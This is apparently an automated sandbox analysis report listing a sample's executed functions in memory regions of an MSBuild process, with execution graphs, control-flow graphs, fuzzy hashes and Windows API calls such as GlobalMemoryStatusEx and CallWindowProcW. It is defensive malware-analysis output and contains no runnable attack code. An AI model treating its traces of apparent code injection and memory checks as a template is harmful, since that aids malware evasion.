                                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6004" "2764" "2772" "2788" "0" "0" "2828" "0" "0" "0" "0" "0"
                                                    Imagebase:0x7ff6070d0000
                                                    File size:229'728 bytes
                                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:8.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:79
                                                      Total number of Limit Nodes:7
                                                      execution_graph 40491 c00848 40493 c0084e 40491->40493 40492 c0091b 40493->40492 40496 c01383 40493->40496 40502 c01493 40493->40502 40497 c0138f 40496->40497 40498 c01339 40496->40498 40499 c01488 40497->40499 40500 c01493 GlobalMemoryStatusEx 40497->40500 40507 c07ec0 40497->40507 40498->40493 40499->40493 40500->40497 40504 c01396 40502->40504 40503 c01488 40503->40493 40504->40503 40505 c01493 GlobalMemoryStatusEx 40504->40505 40506 c07ec0 GlobalMemoryStatusEx 40504->40506 40505->40504 40506->40504 40508 c07eca 40507->40508 40509 c07ee4 40508->40509 40512 5fada08 40508->40512 40516 5fad9f9 40508->40516 40509->40497 40514 5fada1d 40512->40514 40513 5fadc32 40513->40509 40514->40513 40515 5fadc48 GlobalMemoryStatusEx 40514->40515 40515->40514 40518 5fada08 40516->40518 40517 5fadc32 40517->40509 40518->40517 40519 5fadc48 GlobalMemoryStatusEx 40518->40519 40519->40518 40520 bbd030 40521 bbd048 40520->40521 40522 bbd0a2 40521->40522 40527 60fa48c 40521->40527 40536 60fd697 40521->40536 40540 60fe7f8 40521->40540 40549 60fd6a8 40521->40549 40528 60fa497 40527->40528 40529 60fe869 40528->40529 40531 60fe859 40528->40531 40532 60fe867 40529->40532 40569 60fe46c 40529->40569 40553 60fea5c 40531->40553 40559 60fe990 40531->40559 40564 60fe980 40531->40564 40532->40532 40537 60fd6a5 40536->40537 40538 60fa48c CallWindowProcW 40537->40538 40539 60fd6ef 40538->40539 40539->40522 40543 60fe835 40540->40543 40541 60fe869 40542 60fe46c CallWindowProcW 40541->40542 40545 60fe867 40541->40545 40542->40545 40543->40541 40544 60fe859 40543->40544 40546 60fea5c CallWindowProcW 40544->40546 40547 60fe980 CallWindowProcW 40544->40547 40548 60fe990 CallWindowProcW 40544->40548 40545->40545 40546->40545 40547->40545 40548->40545 40550 60fd6ce 40549->40550 40551 60fa48c CallWindowProcW 40550->40551 40552 60fd6ef 40551->40552 40552->40522 40554 60fea1a 40553->40554 40555 60fea6a 40553->40555 40573 60fea38 40554->40573 40577 60fea48 40554->40577 40556 60fea30 40556->40532 40561 60fe9a4 40559->40561 40560 60fea30 40560->40532 40562 60fea38 CallWindowProcW 40561->40562 40563 60fea48 CallWindowProcW 40561->40563 40562->40560 40563->40560 40566 60fe991 40564->40566 40565 60fea30 40565->40532 40567 60fea38 CallWindowProcW 40566->40567 40568 60fea48 CallWindowProcW 40566->40568 40567->40565 40568->40565 40570 60fe477 40569->40570 40571 60ffcca CallWindowProcW 40570->40571 40572 60ffc79 40570->40572 40571->40572 40572->40532 40574 60fea48 40573->40574 40575 60fea59 40574->40575 40580 60ffc00 40574->40580 40575->40556 40578 60fea59 40577->40578 40579 60ffc00 CallWindowProcW 40577->40579 40578->40556 40579->40578 40581 60fe46c CallWindowProcW 40580->40581 40582 60ffc1a 40581->40582 40582->40575 40583 60fd4f0 40584 60fd558 CreateWindowExW 40583->40584 40586 60fd614 40584->40586

                                                      Executed Functions

                                                      Function 05FA0308 Relevance: 9.0, Strings: 6, Instructions: 1490COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-3723351465
                                                      • Opcode ID: 51490714376443d457f6324a7f5e8d121227b09e66881e2232b3bef407d08f5a
                                                      • Instruction ID: 9d00b727b753950661167074f8e04b07a6c77aad58734bbc0d484b8ce6eef64a
                                                      • Opcode Fuzzy Hash: 51490714376443d457f6324a7f5e8d121227b09e66881e2232b3bef407d08f5a
                                                      • Instruction Fuzzy Hash: C6D27A71E002058FDB24DF68D588AADB7F6FF89300F5485A9D409AB365EB34ED85CB81
                                                      Function 05FA9208 Relevance: 8.3, Strings: 6, Instructions: 767COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-3723351465
                                                      • Opcode ID: 84a4729b6601f4adabb06ac9807d3f318438ab7caa76cd74d80a09b795decbaa
                                                      • Instruction ID: 8d1085bab7c741dbbb289954a790241463f5c892d3838d19e61c3387191077cc
                                                      • Opcode Fuzzy Hash: 84a4729b6601f4adabb06ac9807d3f318438ab7caa76cd74d80a09b795decbaa
                                                      • Instruction Fuzzy Hash: 38526E71E002098FDF24DB68D680AAEB7F6FB89310F608835D409EB355DB78DD458B52
                                                      Function 05FA5D50 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1228 5fa5d50-5fa5d6e 1229 5fa5d70-5fa5d73 1228->1229 1230 5fa5d8a-5fa5d8d 1229->1230 1231 5fa5d75-5fa5d83 1229->1231 1232 5fa5dae-5fa5db1 1230->1232 1233 5fa5d8f-5fa5da9 1230->1233 1239 5fa5df6-5fa5e0c 1231->1239 1240 5fa5d85 1231->1240 1235 5fa5db3-5fa5dcf 1232->1235 1236 5fa5dd4-5fa5dd7 1232->1236 1233->1232 1235->1236 1237 5fa5dd9-5fa5de3 1236->1237 1238 5fa5de4-5fa5de6 1236->1238 1243 5fa5de8 1238->1243 1244 5fa5ded-5fa5df0 1238->1244 1248 5fa5e12-5fa5e1b 1239->1248 1249 5fa6027-5fa6031 1239->1249 1240->1230 1243->1244 1244->1229 1244->1239 1250 5fa6032-5fa6067 1248->1250 1251 5fa5e21-5fa5e3e 1248->1251 1254 5fa6069-5fa606c 1250->1254 1258 5fa6014-5fa6021 1251->1258 1259 5fa5e44-5fa5e6c 1251->1259 1256 5fa6072-5fa6081 1254->1256 1257 5fa62a1-5fa62a4 1254->1257 1268 5fa6083-5fa609e 1256->1268 1269 5fa60a0-5fa60e4 1256->1269 1260 5fa62a6-5fa62c2 1257->1260 1261 5fa62c7-5fa62ca 1257->1261 1258->1248 1258->1249 1259->1258 1281 5fa5e72-5fa5e7b 1259->1281 1260->1261 1263 5fa62d0-5fa62dc 1261->1263 1264 5fa6375-5fa6377 1261->1264 1272 5fa62e7-5fa62e9 1263->1272 1265 5fa6379 1264->1265 1266 5fa637e-5fa6381 1264->1266 1265->1266 1266->1254 1271 5fa6387-5fa6390 1266->1271 1268->1269 1282 5fa60ea-5fa60fb 1269->1282 1283 5fa6275-5fa628a 1269->1283 1277 5fa62eb-5fa62f1 1272->1277 1278 5fa6301-5fa6305 1272->1278 1284 5fa62f3 1277->1284 1285 5fa62f5-5fa62f7 1277->1285 1279 5fa6313 1278->1279 1280 5fa6307-5fa6311 1278->1280 1287 5fa6318-5fa631a 1279->1287 1280->1287 1281->1250 1288 5fa5e81-5fa5e9d 1281->1288 1293 5fa6260-5fa626f 1282->1293 1294 5fa6101-5fa611e 1282->1294 1283->1257 1284->1278 1285->1278 1291 5fa632b-5fa6364 1287->1291 1292 5fa631c-5fa631f 1287->1292 1297 5fa6002-5fa600e 1288->1297 1298 5fa5ea3-5fa5ecd 1288->1298 1291->1256 1310 5fa636a-5fa6374 1291->1310 1292->1271 1293->1282 1293->1283 1294->1293 1304 5fa6124-5fa621a call 5fa4570 1294->1304 1297->1258 1297->1281 1311 5fa5ff8-5fa5ffd 1298->1311 1312 5fa5ed3-5fa5efb 1298->1312 1360 5fa6228 1304->1360 1361 5fa621c-5fa6226 1304->1361 1311->1297 1312->1311 1318 5fa5f01-5fa5f2f 1312->1318 1318->1311 1324 5fa5f35-5fa5f3e 1318->1324 1324->1311 1326 5fa5f44-5fa5f76 1324->1326 1333 5fa5f78-5fa5f7c 1326->1333 1334 5fa5f81-5fa5f9d 1326->1334 1333->1311 1335 5fa5f7e 1333->1335 1334->1297 1336 5fa5f9f-5fa5ff6 call 5fa4570 1334->1336 1335->1334 1336->1297 1362 5fa622d-5fa622f 1360->1362 1361->1362 1362->1293 1363 5fa6231-5fa6236 1362->1363 1364 5fa6238-5fa6242 1363->1364 1365 5fa6244 1363->1365 1366 5fa6249-5fa624b 1364->1366 1365->1366 1366->1293 1367 5fa624d-5fa6259 1366->1367 1367->1293
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q
                                                      • API String ID: 0-127220927
                                                      • Opcode ID: dd7ea6e6506ca7476e42fe06675a45dd7e83ef00ab535e361e381d31adb84733
                                                      • Instruction ID: 3adeb8184fa6adaaf36588495c3c86f43a169a83706e24815b52843a3c605c45
                                                      • Opcode Fuzzy Hash: dd7ea6e6506ca7476e42fe06675a45dd7e83ef00ab535e361e381d31adb84733
                                                      • Instruction Fuzzy Hash: F6026A72B002059FDF14DB68D594AAEB7F6FF84304F148568D41ADB394DB39EC868B82
                                                      Function 05FAE0D9 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1499 5fae0d9-5fae0fa 1500 5fae15e-5fae165 1499->1500 1501 5fae0fc-5fae132 call 5fad1b8 call 5fad094 1499->1501 1509 5fae139-5fae13b 1501->1509 1510 5fae13d-5fae156 1509->1510 1511 5fae166-5fae1cd 1509->1511 1510->1500 1521 5fae1cf-5fae1d1 1511->1521 1522 5fae1d6-5fae1e6 1511->1522 1523 5fae475-5fae47c 1521->1523 1524 5fae1e8 1522->1524 1525 5fae1ed-5fae1fd 1522->1525 1524->1523 1527 5fae45c-5fae46a 1525->1527 1528 5fae203-5fae211 1525->1528 1531 5fae47d-5fae4f6 1527->1531 1533 5fae46c-5fae46e 1527->1533 1528->1531 1532 5fae217 1528->1532 1532->1531 1534 5fae31a-5fae342 1532->1534 1535 5fae25b-5fae27d 1532->1535 1536 5fae21e-5fae230 1532->1536 1537 5fae450-5fae45a 1532->1537 1538 5fae3b6-5fae3dc 1532->1538 1539 5fae2f4-5fae315 1532->1539 1540 5fae374-5fae3b1 1532->1540 1541 5fae235-5fae256 1532->1541 1542 5fae2a8-5fae2c9 1532->1542 1543 5fae2ce-5fae2ef 1532->1543 1544 5fae40f-5fae42a 1532->1544 1545 5fae42c-5fae44e 1532->1545 1546 5fae282-5fae2a3 1532->1546 1547 5fae3e1-5fae40d 1532->1547 1548 5fae347-5fae36f 1532->1548 1533->1523 1534->1523 1535->1523 1536->1523 1537->1523 1538->1523 1539->1523 1540->1523 1541->1523 1542->1523 1543->1523 1544->1523 1545->1523 1546->1523 1547->1523 1548->1523
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xaq$$]q
                                                      • API String ID: 0-1280934391
                                                      • Opcode ID: 7e10ef53049b15e0a6817b3e75705053764e6fa197e829ff0e5066c6e82a26f2
                                                      • Instruction ID: d701932424e552df90f5eb80a86d9f4072acb673a48c2f277b099d00c418a120
                                                      • Opcode Fuzzy Hash: 7e10ef53049b15e0a6817b3e75705053764e6fa197e829ff0e5066c6e82a26f2
                                                      • Instruction Fuzzy Hash: 29B1B575B04214DBDB08EF78995567E7BBBBFC8740B05846DD446EB394CE388C028792
                                                      Function 00C0A978 Relevance: 2.8, Instructions: 2797COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d26b20321678c501058bc690523ea5d2866407476151c9025cd3aead5a2de5c
                                                      • Instruction ID: a59ec21dacae8a291b56532f88a4782e5962199ffaf4adcda5c4c159eb3e9bde
                                                      • Opcode Fuzzy Hash: 8d26b20321678c501058bc690523ea5d2866407476151c9025cd3aead5a2de5c
                                                      • Instruction Fuzzy Hash: 7453F531D10B1A8ADB51EF68C8805A9F7B1FF99300F11C79AE45977221FB70AAD5CB81
                                                      Function 00C0DBE0 Relevance: 2.3, Instructions: 2275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 231e06c9e46aef007d8de2ef11370c227ec7bb3dcd38567dd915aeb8ee364281
                                                      • Instruction ID: a87fcf78a2d26ee69d3f6e987be989aea5359ce7b72baf77f68faaffafb652f0
                                                      • Opcode Fuzzy Hash: 231e06c9e46aef007d8de2ef11370c227ec7bb3dcd38567dd915aeb8ee364281
                                                      • Instruction Fuzzy Hash: F4332F31D107198EDB11EF68C8806ADF7B1FF99300F15C79AE459A7261EB70AAC5CB81
                                                      Function 00C0C52C Relevance: 2.1, Instructions: 2143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5dadc1fafd6fb2eb7b3a29da4d270ed068b46212034d7f73060109513b03d6c7
                                                      • Instruction ID: e91fce2670add36effae4fa55fe42dab93267b910dc68215ab52391f17b64d2e
                                                      • Opcode Fuzzy Hash: 5dadc1fafd6fb2eb7b3a29da4d270ed068b46212034d7f73060109513b03d6c7
                                                      • Instruction Fuzzy Hash: 2E33F531C10B1A8ADB51EF68C8805A9F7B1FF99300F11D79AE45977221FB70AAD5CB81
                                                      Function 05FA3560 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $
                                                      • API String ID: 0-3993045852
                                                      • Opcode ID: 73fb7120b6e82e7c5bd84623f00c46b4b0731ed04429a570b7b6d8970482e373
                                                      • Instruction ID: fd0c3774a144f65312a5d8fd50055f88eed0ca881af97bb26b186fff940ed44f
                                                      • Opcode Fuzzy Hash: 73fb7120b6e82e7c5bd84623f00c46b4b0731ed04429a570b7b6d8970482e373
                                                      • Instruction Fuzzy Hash: 492295B6E002158FDF24DBA5C580AAEB7F2FF85314F108869D415AB394DB39DD42CB92
                                                      Function 05FA45C0 Relevance: .8, Instructions: 817COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffa252ec522be783ff8687e6dd6319e8a35da5ff723050d1238065e0ffacab39
                                                      • Instruction ID: 237de6d2f8a05868dcd08f965365e60094473b9cdfe74d6793f9609956cd9af6
                                                      • Opcode Fuzzy Hash: ffa252ec522be783ff8687e6dd6319e8a35da5ff723050d1238065e0ffacab39
                                                      • Instruction Fuzzy Hash: 1B626D76B002049FDF14DB68D588AADB7F6FF88314F148469E4069B395DB79EC42CB82
                                                      Function 05FAA150 Relevance: .6, Instructions: 640COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc0caccd25f41ad5ff4f563e799334deeedc13435b6b18909071745f35c8fd9d
                                                      • Instruction ID: 2ce6b8880cba92655244f755e28c50eb7a7fdc8f4539270feaca04159bc5415f
                                                      • Opcode Fuzzy Hash: fc0caccd25f41ad5ff4f563e799334deeedc13435b6b18909071745f35c8fd9d
                                                      • Instruction Fuzzy Hash: 21329075B002098FDF14DF68D984AAEB7B6FB88310F108529E445D7359DB39DC4ACB92
                                                      Function 00C04AA0 Relevance: .3, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a18127d2744c84ea391dc0523f8c38be4da2ceb81842f9118d2e69de234e5e74
                                                      • Instruction ID: 3d4b41f051ae430594792badad315ae2503303d7a30380dad59e557f0b01807d
                                                      • Opcode Fuzzy Hash: a18127d2744c84ea391dc0523f8c38be4da2ceb81842f9118d2e69de234e5e74
                                                      • Instruction Fuzzy Hash: 96B16EB0E00309DFDF18CFA9D9817AEBBF2AF88314F148129D515E7294EB749981CB81
                                                      Function 00C03E88 Relevance: .2, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8176684f43a0eee4ed78b8f46ca359296084ec6c4c79cf9f464b1d96717f253
                                                      • Instruction ID: f4066917b90821351eadcab8b62db2a6006a06e52ad9a92c7c9d85dd89eb3f60
                                                      • Opcode Fuzzy Hash: f8176684f43a0eee4ed78b8f46ca359296084ec6c4c79cf9f464b1d96717f253
                                                      • Instruction Fuzzy Hash: 3E9181B0E00209DFDF14CFA9C9817DEBBF2BF88304F248129E515A7294DB749986CB81
                                                      Function 05FAE571 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3181 5fae571-5fae58b 3182 5fae58d-5fae5b4 call 5fad1c8 3181->3182 3183 5fae5b5-5fae5d4 call 5fad1d4 3181->3183 3189 5fae5da-5fae639 3183->3189 3190 5fae5d6-5fae5d9 3183->3190 3197 5fae63b-5fae63e 3189->3197 3198 5fae63f-5fae6cc GlobalMemoryStatusEx 3189->3198 3201 5fae6ce-5fae6d4 3198->3201 3202 5fae6d5-5fae6fd 3198->3202 3201->3202
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bff515396157c96b8cb06ebc091a3feb4c7c82a7c865ba9d8e85d8edd6bddb3
                                                      • Instruction ID: 24275c936aa9e3f80955cf3d12888e9a9b1d40559ad3e827325c0b76ea19b5bc
                                                      • Opcode Fuzzy Hash: 7bff515396157c96b8cb06ebc091a3feb4c7c82a7c865ba9d8e85d8edd6bddb3
                                                      • Instruction Fuzzy Hash: C84125B2D043498FCB04DFA9D9402EABBF5AF99310F1485AAD904A7291EB3C9845CB91
                                                      Function 060FD4E4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3205 60fd4e4-60fd556 3207 60fd558-60fd55e 3205->3207 3208 60fd561-60fd568 3205->3208 3207->3208 3209 60fd56a-60fd570 3208->3209 3210 60fd573-60fd5ab 3208->3210 3209->3210 3211 60fd5b3-60fd612 CreateWindowExW 3210->3211 3212 60fd61b-60fd653 3211->3212 3213 60fd614-60fd61a 3211->3213 3217 60fd655-60fd658 3212->3217 3218 60fd660 3212->3218 3213->3212 3217->3218 3219 60fd661 3218->3219 3219->3219
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060FD602
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3349256813.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 3ef53926205435670ac16ea1f81a208c6141242454ee26fe5307e2f2d4699b33
                                                      • Instruction ID: 0a6adddd599f1286eddda186da3592711c97ac2c404f878a2aec505e1a48a396
                                                      • Opcode Fuzzy Hash: 3ef53926205435670ac16ea1f81a208c6141242454ee26fe5307e2f2d4699b33
                                                      • Instruction Fuzzy Hash: D851E0B1D103499FDB54CF99C884ADEBFF5BF49310F64812AE818AB250D774A885CF90
                                                      Function 060FD4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3220 60fd4f0-60fd556 3221 60fd558-60fd55e 3220->3221 3222 60fd561-60fd568 3220->3222 3221->3222 3223 60fd56a-60fd570 3222->3223 3224 60fd573-60fd612 CreateWindowExW 3222->3224 3223->3224 3226 60fd61b-60fd653 3224->3226 3227 60fd614-60fd61a 3224->3227 3231 60fd655-60fd658 3226->3231 3232 60fd660 3226->3232 3227->3226 3231->3232 3233 60fd661 3232->3233 3233->3233
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 060FD602
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3349256813.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: fc9fb215fcb40e6c783d6080c6ec9666c41c311a36a9d76af212e31e7ac7f029
                                                      • Instruction ID: 32c0193b6aabc0e6b0cf591bc21dce3ce7db361b80350cc5ff5f8a1a3b0b8578
                                                      • Opcode Fuzzy Hash: fc9fb215fcb40e6c783d6080c6ec9666c41c311a36a9d76af212e31e7ac7f029
                                                      • Instruction Fuzzy Hash: C541CEB1D103099FDB14CF9AC884ADEBFB5FF48310F24812AE918AB250D774A985CF90
                                                      Function 060FE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3234 60fe46c-60ffc6c 3237 60ffd1c-60ffd3c call 60fa48c 3234->3237 3238 60ffc72-60ffc77 3234->3238 3245 60ffd3f-60ffd4c 3237->3245 3240 60ffcca-60ffd02 CallWindowProcW 3238->3240 3241 60ffc79-60ffcb0 3238->3241 3243 60ffd0b-60ffd1a 3240->3243 3244 60ffd04-60ffd0a 3240->3244 3247 60ffcb9-60ffcc8 3241->3247 3248 60ffcb2-60ffcb8 3241->3248 3243->3245 3244->3243 3247->3245 3248->3247
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 060FFCF1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3349256813.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: 58858a765aa76ef7e13f653563b670546dd29f908e04584f374c020263d79ccd
                                                      • Instruction ID: 66bd31ec330c13374ddc4654f05a41ace54b8cfecdeb53b2567c5335228d89be
                                                      • Opcode Fuzzy Hash: 58858a765aa76ef7e13f653563b670546dd29f908e04584f374c020263d79ccd
                                                      • Instruction Fuzzy Hash: C8413AB591030ACFDB54CF99C488AAABBF5FF88314F24C859D619A7321D774A841CBA1
                                                      Function 05FAE658 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3251 5fae658-5fae696 3252 5fae69e-5fae6cc GlobalMemoryStatusEx 3251->3252 3253 5fae6ce-5fae6d4 3252->3253 3254 5fae6d5-5fae6fd 3252->3254 3253->3254
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 05FAE6BF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID:
                                                      • API String ID: 1890195054-0
                                                      • Opcode ID: c0159e1753001715f36924af3e67ff4f1dfcb9c151e2810ebdcee92785d4516d
                                                      • Instruction ID: 1131572ccfb855e40d4ac2ecb359162221b7d2475f7fe8e22ec5087da21d6a81
                                                      • Opcode Fuzzy Hash: c0159e1753001715f36924af3e67ff4f1dfcb9c151e2810ebdcee92785d4516d
                                                      • Instruction Fuzzy Hash: 28111FB2C006599BCB10DF9AC444B9EFBF8BF48320F10856AE918A7240D378A940CFE5
                                                      Function 00C06EE8 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3257 c06ee8-c06f52 call c06c50 3266 c06f54-c06f6d call c0677c 3257->3266 3267 c06f6e-c06f9c 3257->3267 3271 c06f9e-c06fa0 3267->3271 3272 c06fa2 3271->3272 3273 c06fa7-c06faa 3271->3273 3272->3273 3273->3271 3275 c06fac-c06fb9 3273->3275 3277 c06fd1-c07047 call c06788 call c06798 call c06358 3275->3277 3278 c06fbb-c06fc1 3275->3278 3293 c07049-c07052 3277->3293 3294 c0706a 3277->3294 3279 c06fc3 3278->3279 3280 c06fc5-c06fc7 3278->3280 3279->3277 3280->3277 3296 c07054-c07057 3293->3296 3297 c07059-c07066 3293->3297 3295 c0706d-c07084 3294->3295 3302 c07086-c070ae call c00b34 3295->3302 3303 c070de-c07113 3295->3303 3298 c07068 3296->3298 3297->3298 3298->3295 3312 c070b4-c070d0 3302->3312 3305 c07115 3303->3305 3306 c0711e 3303->3306 3305->3306 3308 c0711f 3306->3308 3308->3308 3314 c070d2 3312->3314 3315 c070db 3312->3315 3314->3315 3315->3303
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LR]q
                                                      • API String ID: 0-3081347316
